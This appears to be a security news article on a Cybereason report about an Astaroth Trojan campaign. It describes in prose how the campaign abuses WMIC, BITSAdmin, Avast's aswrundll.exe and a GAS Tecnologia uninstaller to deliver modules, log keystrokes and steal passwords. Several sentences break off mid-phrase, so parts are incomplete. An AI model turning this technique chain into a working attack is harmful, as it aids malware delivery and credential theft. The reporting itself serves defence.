Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.
“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as
The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts,
The BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.
This Astaroth Trojan is distributed through spam campaigns, malicious messages use a .7zip file as an attachment or include a hyperlink that points to the archive.
The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”
The malware uses the BITSAdmin to fetch a payload from another Command and Control server, this malicious code is obfuscated as images or files without extensions and contains various Astaroth modules.
The malware also injects a malicious module in the aswrundll.exe Avast Software Runtime Dynamic Link Library used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.
The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither injection nor a privilege escalation, attackers are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. Avast had issued a detection for the malware and
The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.
The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitoring the
The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords
“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.
“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”